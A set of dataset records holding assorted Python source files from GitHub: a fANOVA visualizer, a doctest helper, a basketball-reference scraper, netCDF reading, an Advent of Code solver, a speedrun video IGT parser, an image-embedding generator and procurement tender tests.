plt.tight_layout()\n\n else:\n\n # PREPROCESS\n mean, std, grid = self.generate_marginal(param_idx, resolution)\n mean = np.asarray(mean)\n std = np.asarray(std)\n\n lower_curve = mean - std\n upper_curve = mean + std\n\n if log_scale is None:\n log_scale = self.cs_params[param].log or (np.diff(grid).std() > 0.000001)\n\n # PLOT\n if log_scale:\n if (np.diff(grid).std() > 0.000001):\n self.logger.info(\"It might be better to plot this parameter\"\n \" '%s' in log-scale.\", param_name)\n plt.semilogx(grid, mean, 'b', label='predicted %s' % self._y_label)\n else:\n plt.plot(grid, mean, 'b', label='predicted %s' % self._y_label)\n plt.fill_between(grid, upper_curve, lower_curve, facecolor='red',\n alpha=0.6, label='std')\n\n if incumbents is not None:\n if not isinstance(incumbents, list):\n incumbents = [incumbents]\n values = [inc[param_name] for inc in incumbents if param_name in inc and inc[param_name] is not None]\n indices = [(np.abs(np.asarray(grid) - val)).argmin() for val in values]\n if len(indices) > 0:\n plt.scatter(list([grid[idx] for idx in indices]),\n list([mean[idx] for idx in indices]),\n label='incumbent', c='black', marker='.', zorder=999)\n\n plt.xlabel(param_name)\n plt.ylabel(self._y_label)\n plt.grid(True)\n plt.legend()\n plt.tight_layout()\n\n if show:\n plt.show()\n else:\n return plt\n\n def create_most_important_pairwise_marginal_plots(self, params=None, n=20, three_d=True):\n \"\"\"\n Creates plots of the n most important pairwise marginals of the whole ConfigSpace\n\n Parameters\n ------------\n params: list\n Contains the selected parameters for pairwise evaluation\n n: int\n The number of most relevant pairwise marginals that will be returned\n three_d: boolean\n whether or not to plot pairwise marginals in 3D-plot\n\n \"\"\"\n if self.fanova._dict:\n most_important_pairwise_marginals = self.fanova.tot_imp_dict\n else:\n if params is not None:\n most_important_pairwise_marginals = self.fanova.get_most_important_pairwise_marginals(params=params)\n else:\n most_important_pairwise_marginals = self.fanova.get_most_important_pairwise_marginals(n=n)\n\n for param1, param2 in most_important_pairwise_marginals:\n param1, param2 = self.cs.get_idx_by_hyperparameter_name(param1), self.cs.get_idx_by_hyperparameter_name(param2)\n param_names = [self.cs_params[param1].name, self.cs_params[param2].name]\n param_names = str(param_names)\n param_names = re.sub('[!,@#\\'\\n$\\[\\]]', '', param_names)\n outfile_name = os.path.join(self.directory, str(param_names).replace(\" \",\"_\") + \".png\")\n self.logger.info(\"creating %s\" % outfile_name)\n self.plot_pairwise_marginal((param1, param2), show=False, three_d=three_d)\n plt.savefig(outfile_name)\n\n","repo_name":"heungseok/fanova","sub_path":"fanova/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":18252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"}
+{"seq_id":"30422630165","text":"import doctest\nimport manuel\nimport re\nimport sys\nimport textwrap\n\nfrom manuel.codeblock import (\n CODEBLOCK_START,\n CODEBLOCK_END,\n CodeBlock,\n execute_code_block,\n )\n\n# version markers\n\nfrom ..compat import PY2 as py_2\npy_33_plus = sys.version_info[:2] >= (3, 3)\npy_34_plus = sys.version_info[:2] >= (3, 4)\npy_35_plus = sys.version_info[:2] >= (3, 5)\n\n# Python 2.7 compatibility stuff\n\nBYTE_LITERALS = re.compile(\"^b('.*')$\", re.MULTILINE)\n\n\ndef find_code_blocks(document):\n for region in document.find_regions(CODEBLOCK_START, CODEBLOCK_END):\n start_end = CODEBLOCK_START.search(region.source).end()\n source = textwrap.dedent(region.source[start_end:])\n if py_2:\n source = BYTE_LITERALS.sub('\\\\1', source)\n source = 'from __future__ import print_function\\n' + source\n source_location = '%s:%d' % (document.location, region.lineno)\n code = compile(source, source_location, 'exec', 0, True)\n document.claim_region(region)\n region.parsed = CodeBlock(code, source)\n\n\nclass Manuel(manuel.Manuel):\n def __init__(self):\n manuel.Manuel.__init__(self, [find_code_blocks], [execute_code_block])\n\n\nif py_2:\n class DocTestChecker(doctest.OutputChecker):\n def check_output(self, want, got, optionflags):\n want = BYTE_LITERALS.sub('\\\\1', want)\n return doctest.OutputChecker.check_output(\n self, want, got, optionflags\n )\nelse:\n DocTestChecker = doctest.OutputChecker\n","repo_name":"stuckyb/ontopilot","sub_path":"python-src/test/testfixtures/tests/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"19600641802","text":"# [] square brackets denote a list\n\nletters = [\"a\", \"b\", \"c\"]\nmatrix = [[0, 1], [2, 3]]\nzeros = [0] * 5\ncombined = zeros + letters\nnumbers = list(range(20))\nchars = list(\"Hello World\")\nprint(chars)\nprint(len(chars))\nprint(chars.index(\"o\",chars.index(\"o\")+1))","repo_name":"sipakhti/code-with-mosh-python","sub_path":"Data Structure/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22538570870","text":"import os\nfrom bs4 import BeautifulSoup\nfrom playwright.sync_api import sync_playwright, TimeoutError as PlaywrightTimeout\nimport time\n\n\nSEASONS = list(range(2016, 2023))\nDATA_DIR = \"data\"\nSTANDINGS_DIR = os.path.join(DATA_DIR, \"standings\")\nSCORES_DIR = os.path.join(DATA_DIR, \"scores\")\n\nasync def get_html(url, selector, sleep=5, retries=3):\n html = None\n for i in range(1, retries+1): \n time.sleep(sleep*i)\n\n try: \n with sync_playwright() as p: \n browser = await p.chromium.launch()\n page = await browser.new_page()\n page.goto(url)\n print(await page.title())\n html = await page.inner_html(selector)\n\n except PlaywrightTimeout:\n print(f\"Timeourt error {url}\")\n continue\n\n else:\n break \n return html\n\nseason = 2016\nurl = f\"https://www.basketball-reference.com/leagues/NBA_{season}_games.html\"\n\nhtml = get_html(url, \"#content .filter\")\n\nprint(html)\n\n#soup = BeautifulSoup(html)\n#links = soup.find_all(\"a\")\n#href = [l[\"href\"] for l in links]\n\n","repo_name":"michaelzwartz/Unsupervised-ML","sub_path":"NBA Predictions/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"43346753836","text":"import netCDF4 as nc\nimport numpy as np\n\nfN = '/home/ssilje/PYTHON_course/pyvis/data/HadEX2_GSL.nc'\n\n\nncf = nc.Dataset(fN)\n\nprint(ncf)\n\n# get all variables\nprint(ncf.variables.keys())\n\n# get a variable from the file\nncf.variables['lon']\n\n\n\nncf.variables['time'].units\n\n\n# get data of lon from the file\nlon = ncf.variables['lon'][:]\n# this is a numpy array\nlon\n\n\n# get data of lat from the file \nlat = ncf.variables['lat'][:]\n# this is a numpy array \nlat\n\n\n# load the trend\ntrend_masked = ncf.variables['trend'][:]\n\ntrend_masked\n\n\n# example\n\nma = np.ma.array([0., 1, 2], mask=[True, False, False], fill_value=np.NaN)\nma\n\n\n\nimport xarray as xr\n\nimport numpy as np\n\n\n\n\nds = xr.open_dataset(fN)\n\nds\n\n\nlat = ds['lat']\nlat[:10]\n\n\nlon = ds.lon\nlon[:10]\n\n\nlat = ds.lat\nlat[:10]\n\n\nlat.values[:10]\n\nprint(np.asarray(lat)[:10])\n\n","repo_name":"ssilje/PYTHON_course","sub_path":"PYTHON_course/read_netcdf.py","file_name":"read_netcdf.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10242540526","text":"#! /usr/bin/python3\nimport sys\n\n\nclass Dir:\n def __init__(self, name, parent=None):\n self.name = name\n self.parent = parent\n self.subdirs = []\n self.files = []\n\n @property\n def size(self):\n return sum(d.size for d in self.subdirs + self.files)\n\n def walk(self):\n yield self\n for subdir in self.subdirs:\n yield from subdir.walk()\n\n\nclass File:\n def __init__(self, name, size):\n self.name = name\n self.size = size\n\n\ndef parse_input(path):\n root = Dir('/')\n cwd = root\n for line in open(path):\n line = line.strip()\n if line.startswith('$ cd '):\n target = line[len('$ cd '):]\n if target == '..':\n cwd = cwd.parent\n elif target == '/':\n cwd = root\n else:\n cwd = [d for d in cwd.subdirs if d.name == target][0]\n elif not line.startswith('$'):\n attr, name = line.split()\n if attr == 'dir':\n cwd.subdirs.append(Dir(name, cwd))\n else:\n cwd.files.append(File(name, int(attr)))\n return root\n\n\ndef main(input_file):\n tree = parse_input(input_file)\n\n small_dirs = [d for d in tree.walk() if d.size <= 100000]\n print(\"Part 1:\", sum(d.size for d in small_dirs))\n\n req_space = 30000000 - (70000000 - tree.size)\n candidates = [d for d in tree.walk() if d.size >= req_space]\n candidates.sort(key=lambda d: d.size)\n print(\"Part 2:\", candidates[0].size)\n\n\nif __name__ == '__main__':\n main(sys.argv[1])\n","repo_name":"davearussell/advent2022","sub_path":"day07/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
+{"seq_id":"2521702688","text":"import cv2\nimport numpy as np\nimport pickle\nfrom pywinauto import application\n\nfrom imageProcessing import *\n\ndef in_range(n, a, b):\n ''' Checks if number is n in ]a, b[ '''\n\n if n > a and n < b:\n return True\n return False\n\ndef mean_hsv(v):\n ''' Calculates the mean color of a HSV picture.\n @param v: cv2 HSV picture. '''\n\n mean = 0\n for i in range(len(v)):\n for j in range(len(v[i])):\n mean += v[i][j][0]\n return mean / (len(v) * len(v[0]))\n\ndef load_video(file_path):\n ''' Opens a video using OpenCV2 library.\n @param file_path: path of the video file.'''\n\n # Loading the speedrun\n video = cv2.VideoCapture(file_path)\n # Reading the first frame for the first time\n status, original_frame = video.read()\n # Creating a grayscale copy\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n # Getting information about the original height and width\n height, width = frame.shape\n\n return video, original_frame, frame, height, width\n\ndef close_video(video):\n ''' Closes a OpenCV2 video, as well as any cv2 window opened.\n @param video: cv2 video. '''\n\n video.release()\n cv2.destroyAllWindows()\n\ndef crop_video(file_path):\n ''' This function executes an user interface responsible for\n cropping the video file.\n @param file_path: path of the video file. '''\n\n video, original_frame, _, height, width = load_video(file_path)\n window_name = \"Crop the game\"\n\n # The idea is to bring the OpenCV2 window to focus\n # However, there's no native way of doing it inside OpenCV2's library\n # To achieve the same result, there's a hacky way using pywinauto\n # If I create a blank window, I can search for its name and focus it\n\n # Setting this blank window on focus\n app = application.Application()\n cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)\n app.connect(title_re=window_name)\n app_dialog = app.top_window()\n app_dialog.minimize()\n app_dialog.restore()\n\n # The blank window always gets maximized when focused again.\n # To fix that, for some reason destroying the opencv2 window and\n # creating a new one will fix the window resolution, and also\n # create a new window already focused\n cv2.destroyAllWindows()\n\n # Values used to store the sub-window of the video window\n h1, h2, w1, w2 = 0, height, 0, width\n\n # Loop until user is done with cropping the speedrun\n done = False\n while not done:\n\n # Reset the video window to its original size\n h1, h2, w1, w2 = 0, height, 0, width\n while True:\n\n # Displays the updated version of the video file\n cv2.imshow(window_name, original_frame[h1:h2, w1:w2])\n key = cv2.waitKey(0) & 0xFF\n\n # User can crop the video file by using the keys WASD\n if key == ord('a') or key == ord('A'):\n w1 += 1\n if key == ord('w') or key == ord('W'):\n h1 += 1\n if key == ord('s') or key == ord('S'):\n h2 -= 1\n if key == ord('d') or key == ord('D'):\n w2 -= 1\n\n # User can quit the program using Q\n if key == ord('q') or key == ord('Q'):\n video.release()\n cv2.destroyAllWindows()\n quit()\n\n # User can reset the video window by pressing ESC\n if key == 27:\n cv2.destroyWindow(window_name)\n break\n\n # Pressing ENTER submits the cropping\n if key == 10 or key == 13:\n done = True\n cv2.destroyWindow(window_name)\n break\n\n close_video(video)\n\n return h1, h2, w1, w2\n\ndef process_video(file_path, h1, h2, w1, w2, version, category, stdscr):\n\n # Constants\n NUMBER_ONE_COORD = (\n (25, 35, 75, 85), # NTSC-U\n (30, 40, 75, 85), # PAL\n (25, 35, 75, 85), # NTSC-J\n )\n DIGIT_COORD = (\n ((10, 24), (9, 23), (10, 24)), # First digit; NTSC-U, PAL, NTSC-J\n ((35, 48), (32, 45), (30, 43)), # Second digit; NTSC-U, PAL, NTSC-J\n ((50, 63), (44, 57), (43, 56)), # Third digit; NTSC-U, PAL, NTSC-J\n ((74, 87), (65, 78), (64, 77)), # Fourth digit; NTSC-U, PAL, NTSC-J\n ((89, 102), (76, 91), (77, 90)), # Fifth digit; NTSC-U, PAL, NTSC-J\n )\n ROW_COORD = (\n (6, 28, 6, 28, 6, 28), # NTSC-U\n (5, 26, 4, 25, -1, 20), # PAL\n (6, 28, 6, 28, 6, 28), # NTSC-J\n )\n GAME_SIZE = (435, 323)\n X_BUTTON_COORD = (\n (290, 300, 170, 180), # NTSC-U\n (280, 290, 170, 180), # PAL\n (290, 300, 170, 180), # NTSC-J\n )\n IGT_COORD = (\n (10, 103, 288, 420), # NTSC-U\n (10, 93, 288, 407), # PAL\n (10, 103, 288, 420), # NTSC-J\n )\n HEIGHT_FIX = 0\n WIDTH_FIX = 0\n\n # Load video\n video, original_frame, frame, height, width = load_video(file_path)\n # Saving cropped frame\n original_frame = original_frame[h1:h2, w1:w2]\n # Saving cropped grayscale copy\n frame = frame[h1:h2, w1:w2]\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n frame = cv2.resize(frame, GAME_SIZE)\n # Update height and width\n height, width = frame.shape\n # Load machine learning model to predict the CTR digits\n model = pickle.load(open(\"CTR_digits.knn\", 'rb'))\n # Variable that adjusts the cropping in the first race\n first_race = True\n # Variables to store the returning values\n igt = []\n times = []\n\n # Time set to ignore impossible frames between races, loads and hub movement\n timeout = 2100\n # Setting number of races of the speedrun\n num_races = 0\n if category == 0:\n num_races = 21\n elif category == 1:\n num_races = 16\n\n # Number of in game time screens found in the game\n igt_found = 0\n\n # While there are still in game time screens to be found\n while igt_found < num_races:\n\n # If you're in a timeout, ignore the frames\n if timeout > 0:\n status, original_frame = video.read()\n timeout -= 1\n # If the timeout is over\n if timeout == 0:\n # Apply transformations, since the last frame of the timeout\n # will be checked in the next iteration\n original_frame = original_frame[h1:h2, w1:w2]\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n frame = cv2.resize(frame, GAME_SIZE)\n continue\n\n # If the screen flashed white, the next frames may contain an in game time screen\n if np.mean(frame[0:50, 0:50]) > 200 and np.mean(frame[height - 50 : height, width - 50 : width]) > 200:\n\n # Store possible in game time images\n cache = []\n\n has_checked = False\n frame_window = 10\n # Check the next frames in the frame_window\n while True:\n\n # Crop the area of the blue X button\n x_continue = original_frame[X_BUTTON_COORD[version][0] : X_BUTTON_COORD[version][1], X_BUTTON_COORD[version][2] : X_BUTTON_COORD[version][3]]\n # Transform to HSV, so we can measure how blue the image is\n x_continue_hsv = cv2.cvtColor(x_continue, cv2.COLOR_BGR2HSV_FULL)\n # Calculate the mean value of the \"h\" (color)\n x_mean = mean_hsv(x_continue_hsv)\n\n # Crop the area of the top of the \"1\" number\n number_one = original_frame[NUMBER_ONE_COORD[version][0]: NUMBER_ONE_COORD[version][1], NUMBER_ONE_COORD[version][2] : NUMBER_ONE_COORD[version][3]]\n # Transform to HSV, so we can measure how yellow the image is\n number_one_hsv = cv2.cvtColor(number_one, cv2.COLOR_BGR2HSV_FULL)\n # Calculate the mean value of the \"h\" (color)\n one_mean = mean_hsv(number_one_hsv)\n\n # If the average color of the x button is blue enough AND\n # the average color of the top of the \"1\" is yellow enough\n if in_range(x_mean, 150, 200) and in_range(one_mean, 25, 55):\n\n # You found a finish level screen\n # Add the IGT crop to the cache\n cache.append(frame[IGT_COORD[version][0] : IGT_COORD[version][1], IGT_COORD[version][2] : IGT_COORD[version][3]])\n\n status, original_frame = video.read()\n # Checking end of video\n if status == False:\n break\n\n # Read new frame, crop and make a grayscale copy\n original_frame = original_frame[h1:h2, w1:w2]\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n frame = cv2.resize(frame, GAME_SIZE)\n\n frame_window -= 1\n # If you've checked every frame\n if frame_window == 0:\n\n # If you already checked the next ten seconds, you're done in this loop\n if has_checked:\n break\n\n # If you found an IGT match, you're done in this loop\n if len(cache) > 0:\n break\n\n # If you didn't, check the next ten seconds,\n # since some people may wait in the end without mashing X\n frame_window = 300\n has_checked = True\n\n # If you found any possible IGT match\n if (len(cache) > 0):\n\n # Find the \"darkest\" IGT image\n minimum = 160\n for img in cache:\n if np.mean(img) < minimum and np.mean(img) > 70:\n minimum = np.mean(img)\n in_game_time = img\n\n # Set a timeout, you won't need to check end of race in the next 1:10\n timeout = 2100\n # Increase the number of IGT screens found\n igt_found += 1\n # Update the progress to the user\n stdscr.addstr(igt_found, 0, str(igt_found)+\"/\"+str(num_races)+\" IGT screens found.\")\n stdscr.refresh()\n\n # Crop the rows from the IGT screen\n rows = []\n for i in range(3):\n # Variables to adjust the height of the rows\n HEIGHT_FIX = 0\n fixed_height = False\n\n while True:\n\n # Crop the row\n row = in_game_time[26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i] : 26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i + 1], 0:]\n # Crop the first digit of the row and process it\n digit = row[0:, WIDTH_FIX + DIGIT_COORD[0][version][0] : WIDTH_FIX + DIGIT_COORD[0][version][1]]\n digit = cv2.resize(digit, DIGIT_SIZE)\n digit = process_digit(digit)\n\n # The idea is to measure the distance from the borders of the\n # digit to the first non black pixels of the number, and then\n # try to allign the number. Width check is only done on the\n # very first race, since having a 1 minute start lap will break\n # this allignment algorithm.\n # This fixes small misallignment in different capture card outputs\n\n if not first_race:\n # Calculating the distance from the up and down sides\n dist_up = DIGIT_HEIGHT\n dist_down = DIGIT_HEIGHT\n for y in range(DIGIT_WIDTH):\n visited_up = False\n visited_down = False\n for x in range(DIGIT_HEIGHT):\n if not visited_down and digit[DIGIT_HEIGHT - x - 1, y] != BLACK:\n dist_down = min(dist_down, x)\n visited_down = True\n\n if not visited_up and digit[x, y] != BLACK:\n dist_up = min(dist_up, x)\n visited_up = True\n\n if visited_down and visited_up:\n break\n\n # Getting the maximum distance, i.e the side that needs\n # to be corrected\n temp = max(dist_up, dist_down)\n fixed_height = True\n # If the maximum distance is greater than this threadhold\n if temp > 2:\n # Adjust the height when cropping the digits\n if temp == dist_up:\n HEIGHT_FIX = dist_up - 2\n else:\n HEIGHT_FIX = 2 - dist_down\n\n # If it's the first race, do a width check.\n # Same code as for the up and down sides, except that this time\n # we calculate the average distance of the pixels, instead of using\n # the very first non black pixel as the total distance.\n\n # I used different algorithms for the sides because they proved to\n # be more effective after testing with multiple runs.\n if first_race:\n first_race = False\n\n dist_right = DIGIT_WIDTH\n dist_left = DIGIT_WIDTH\n valid_right = 0\n valid_left = 0\n\n # Ignoring pixels too close to the border, since they usually are\n # always black, which messes up with the average distance of the\n # pixels that represents the number\n\n for x in range(DIGIT_HEIGHT // 3, (DIGIT_HEIGHT * 2 // 3) + 1):\n visited_right = False\n visited_left = False\n for y in range(DIGIT_WIDTH // 2):\n if not visited_left and digit[x, DIGIT_WIDTH - 1 - y] != BLACK:\n dist_left += y\n valid_left += 1\n visited_left = True\n\n if not visited_right and digit[x, y] != BLACK:\n dist_right += y\n valid_right += 1\n visited_right = True\n\n if visited_left and visited_right:\n break\n\n # Calculating tyhe average distance\n dist_right = dist_right // valid_right\n dist_left = dist_left // valid_left\n\n if dist_right > 2:\n WIDTH_FIX = dist_right - 2\n elif dist_left > 2:\n WIDTH_FIX = 2 - dist_left\n\n row = in_game_time[26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i] : 26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i + 1], 0:]\n\n if fixed_height:\n rows.append(row)\n break\n\n # List to store each predicted digit\n lap_times = []\n for i in range(3):\n for j in range(5):\n digit = rows[i][0:, WIDTH_FIX + DIGIT_COORD[j][version][0] : WIDTH_FIX + DIGIT_COORD[j][version][1]] \n # Resizing each digit to make them bigger,\n # and also make sure that they will have the same size for the KNN input.\n digit = cv2.resize(digit, DIGIT_SIZE_HIGH)\n # Process the digit before predicting\n digit = process_digit(digit)\n # Predict the number and store it\n n = model.predict(np.reshape(digit, (1, digit.shape[0] * digit.shape[1])))\n lap_times.append(n[0])\n\n # Storing final values\n times.append(lap_times)\n igt.append(in_game_time)\n\n # Read new frame, apply transformations and check the status of the video\n status, original_frame = video.read()\n if status == False:\n break\n original_frame = original_frame[h1:h2, w1:w2]\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n frame = cv2.resize(frame, GAME_SIZE)\n\n close_video(video)\n return times, igt","repo_name":"mateusfavarin/CTR-AutoIGT","sub_path":"src/videoProcessing.py","file_name":"videoProcessing.py","file_ext":"py","file_size_in_byte":17449,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
+{"seq_id":"2875190122","text":"import tensorflow as tf\r\nfrom tensorflow.keras.applications.vgg16 import VGG16, preprocess_input as preprocess_vgg16\r\nfrom tensorflow.keras.applications.resnet50 import ResNet50, preprocess_input as preprocess_resnet50\r\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3, preprocess_input as preprocess_inceptionv3\r\nfrom tensorflow.keras.applications.mobilenet_v2 import MobileNetV2, preprocess_input as preprocess_mobilenetv2\r\nfrom tensorflow.keras.preprocessing import image\r\nimport numpy as np\r\nimport os\r\nimport json\r\navailable_models = ['mobilenetv2', 'vgg16', 'resnet50', 'inceptionv3']\r\nclass ImageEmbeddings:\r\n def __init__(self, model_name):\r\n self.model_name = model_name\r\n self.available_models = ['mobilenetv2', 'vgg16', 'resnet50', 'inceptionv3']\r\n self.model = self._load_model()\r\n\r\n def _load_model(self):\r\n if self.model_name in available_models:\r\n if self.model_name == 'vgg16':\r\n model = VGG16(weights='imagenet')\r\n self.preprocess_fn = preprocess_vgg16\r\n elif self.model_name == 'resnet50':\r\n model = ResNet50(weights='imagenet')\r\n self.preprocess_fn = preprocess_resnet50\r\n elif self.model_name == 'inceptionv3':\r\n model = InceptionV3(weights='imagenet')\r\n self.preprocess_fn = preprocess_inceptionv3\r\n elif self.model_name == 'mobilenetv2':\r\n model = MobileNetV2(weights='imagenet')\r\n self.preprocess_fn = preprocess_mobilenetv2\r\n else:\r\n raise ValueError('Invalid model name. Supported models: vgg16, resnet50, inceptionv3, mobilenetv2')\r\n return model\r\n\r\n def convert_to_embeddings(self, img_path):\r\n # Load and preprocess the image\r\n print(self.model.input_shape)\r\n img = image.load_img(img_path, target_size=(self.model.input_shape[1], self.model.input_shape[2]))\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = self.preprocess_fn(x)\r\n\r\n # Get the embeddings/features from the pre-trained model\r\n embeddings = self.model.predict(x)\r\n\r\n # The embeddings will be a 4D tensor, you can reshape it to 1D if needed\r\n embeddings = embeddings.flatten()\r\n\r\n return embeddings\r\n \r\ndef GenerateEmbeddings(img_path):\r\n Embeddings_dict = {}\r\n #Custom JSON encoder to handle NumPy arrays\r\n class NumpyArrayEncoder(json.JSONEncoder):\r\n def default(self, obj):\r\n if isinstance(obj, np.ndarray):\r\n return obj.tolist() # Convert NumPy array to Python list\r\n return json.JSONEncoder.default(self, obj)\r\n if os.path.exists(img_path):\r\n for model in available_models:\r\n embeddings = ImageEmbeddings(model)\r\n embeddings = embeddings.convert_to_embeddings(img_path)\r\n Embeddings_dict[model] = embeddings\r\n \r\n # Dump the dictionary to a JSON file\r\n filename = os.path.join(os.path.dirname(img_path),'embeddings.json' )\r\n json_str = json.dumps(Embeddings_dict, cls=NumpyArrayEncoder)\r\n with open(filename, 'w') as file:\r\n file.write(json_str)\r\n else:\r\n raise ValueError(f\"Could not find the image {img_path}\")\r\n return Embeddings_dict, filename\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # # Create an instance of the ImageEmbeddings class for VGG16 model\r\n # embeddings_vgg16 = ImageEmbeddings('vgg16')\r\n\r\n # # Convert image to embeddings using VGG16\r\n img_path = 'C:\\Prajwal\\Generative Design\\sample_data_af\\S00UBY6-W1.png'\r\n # vgg16_embeddings = embeddings_vgg16.convert_to_embeddings(img_path)\r\n # print(\"VGG16 embeddings:\", vgg16_embeddings)\r\n\r\n # # Create an instance of the ImageEmbeddings class for ResNet50 model\r\n # embeddings_resnet50 = ImageEmbeddings('resnet50')\r\n\r\n # # Convert image to embeddings using ResNet50\r\n # resnet50_embeddings = embeddings_resnet50.convert_to_embeddings(img_path)\r\n # print(\"ResNet50 embeddings:\", resnet50_embeddings)\r\n\r\n # # Create an instance of the ImageEmbeddings class for InceptionV3 model\r\n # embeddings_inceptionv3 = ImageEmbeddings('inceptionv3')\r\n\r\n # # Convert image to embeddings using InceptionV3\r\n # inceptionv3_embeddings = embeddings_inceptionv3.convert_to_embeddings(img_path)\r\n # print(\"InceptionV3 embeddings:\", inceptionv3_embeddings)\r\n\r\n # # Create an instance of the ImageEmbeddings class for MobileNetV2 model\r\n # embeddings_mobilenetv2 = ImageEmbeddings('mobilenetv2')\r\n\r\n # # Convert image to embeddings using MobileNetV2\r\n # mobilenetv2_embeddings = embeddings_mobilenetv2.convert_to_embeddings(img_path)\r\n # print(\"MobileNetV2 embeddings:\", mobilenetv2_embeddings)\r\n\r\n print(GenerateEmbeddings(img_path))\r\n","repo_name":"Praj-17/Deep-Learning","sub_path":"Embeddings.py","file_name":"Embeddings.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34581262567","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nfrom openprocurement.api.tests.base import snitch\n\nfrom openprocurement.tender.belowthreshold.tests.base import test_lots\nfrom openprocurement.tender.belowthreshold.tests.lot import (\n TenderLotResourceTestMixin,\n TenderLotFeatureResourceTestMixin,\n TenderLotProcessTestMixin,\n)\nfrom openprocurement.tender.belowthreshold.tests.lot_blanks import tender_lot_milestones\n\nfrom openprocurement.tender.openua.tests.base import test_bids\nfrom openprocurement.tender.openua.tests.lot import TenderUALotResourceTestMixin, TenderUALotProcessTestMixin\nfrom openprocurement.tender.openua.tests.lot_blanks import (\n # TenderLotFeatureResourceTest\n create_tender_bidder_invalid,\n patch_tender_bidder,\n # TenderLotFeatureBidderResourceTest\n create_tender_bidder_feature_invalid,\n create_tender_bidder_feature,\n)\n\nfrom openprocurement.tender.openuadefense.tests.base import BaseTenderUAContentWebTest, test_tender_data\nfrom openprocurement.tender.openuadefense.tests.lot_blanks import (\n # TenderLotEdgeCasesTest\n question_blocking,\n claim_blocking,\n next_check_value_with_unanswered_question,\n next_check_value_with_unanswered_claim,\n # TenderLotProcessTest\n one_lot_1bid,\n two_lot_1bid_0com_1can,\n two_lot_1bid_0com_0win,\n two_lot_1bid_1com_1win,\n two_lot_1bid_2com_1win,\n two_lot_2bid_on_first_and_1_on_second_awarding,\n)\n\n\nclass TenderLotResourceTest(BaseTenderUAContentWebTest, TenderLotResourceTestMixin, TenderUALotResourceTestMixin):\n test_lots_data = test_lots\n test_tender_lot_milestones = snitch(tender_lot_milestones)\n\n\nclass TenderLotEdgeCasesTest(BaseTenderUAContentWebTest):\n initial_lots = test_lots * 2\n initial_bids = test_bids\n\n test_question_blocking = snitch(question_blocking)\n test_claim_blocking = snitch(claim_blocking)\n test_next_check_value_with_unanswered_question = snitch(next_check_value_with_unanswered_question)\n test_next_check_value_with_unanswered_claim = snitch(next_check_value_with_unanswered_claim)\n\n\nclass TenderLotFeatureResourceTest(BaseTenderUAContentWebTest, TenderLotFeatureResourceTestMixin):\n initial_data = test_tender_data\n initial_lots = 2 * test_lots\n invalid_feature_value = 0.5\n max_feature_value = 0.3\n sum_of_max_value_of_all_features = 0.3\n\n\nclass TenderLotBidderResourceTest(BaseTenderUAContentWebTest):\n # initial_status = 'active.tendering'\n initial_lots = test_lots\n\n test_create_tender_bidder_invalid = snitch(create_tender_bidder_invalid)\n test_patch_tender_bidder = snitch(patch_tender_bidder)\n\n\nclass TenderLotFeatureBidderResourceTest(BaseTenderUAContentWebTest):\n initial_lots = test_lots\n\n def setUp(self):\n super(TenderLotFeatureBidderResourceTest, self).setUp()\n self.lot_id = self.initial_lots[0][\"id\"]\n response = self.app.patch_json(\n \"/tenders/{}?acc_token={}\".format(self.tender_id, self.tender_token),\n {\n \"data\": {\n \"items\": [{\"relatedLot\": self.lot_id, \"id\": \"1\"}],\n \"features\": [\n {\n \"code\": \"code_item\",\n \"featureOf\": \"item\",\n \"relatedItem\": \"1\",\n \"title\": u\"item feature\",\n \"enum\": [{\"value\": 0.01, \"title\": u\"good\"}, {\"value\": 0.02, \"title\": u\"best\"}],\n },\n {\n \"code\": \"code_lot\",\n \"featureOf\": \"lot\",\n \"relatedItem\": self.lot_id,\n \"title\": u\"lot feature\",\n \"enum\": [{\"value\": 0.01, \"title\": u\"good\"}, {\"value\": 0.02, \"title\": u\"best\"}],\n },\n {\n \"code\": \"code_tenderer\",\n \"featureOf\": \"tenderer\",\n \"title\": u\"tenderer feature\",\n \"enum\": [{\"value\": 0.01, \"title\": u\"good\"}, {\"value\": 0.02, \"title\": u\"best\"}],\n },\n ],\n }\n },\n )\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(response.content_type, \"application/json\")\n self.assertEqual(response.json[\"data\"][\"items\"][0][\"relatedLot\"], self.lot_id)\n\n test_create_tender_bidder_invalid = 